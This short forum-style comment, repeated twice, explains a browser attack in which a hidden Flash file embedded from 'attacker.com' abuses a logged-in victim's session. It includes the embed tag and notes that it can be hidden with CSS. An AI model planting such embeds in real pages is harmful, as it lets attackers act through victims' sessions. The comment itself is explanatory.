<embed src="http://attacker.com/evil.swf></embed>
is all that you need to execute this attack in your browser. An attacker can hide the applet via CSS and put it on a legitimate looking page. All the target needs to do is be logged in. <embed src="http://attacker.com/evil.swf></embed>
is all that you need to execute this attack in your browser. An attacker can hide the applet via CSS and put it on a legitimate looking page. All the target needs to do is be logged in.Edit: grammar.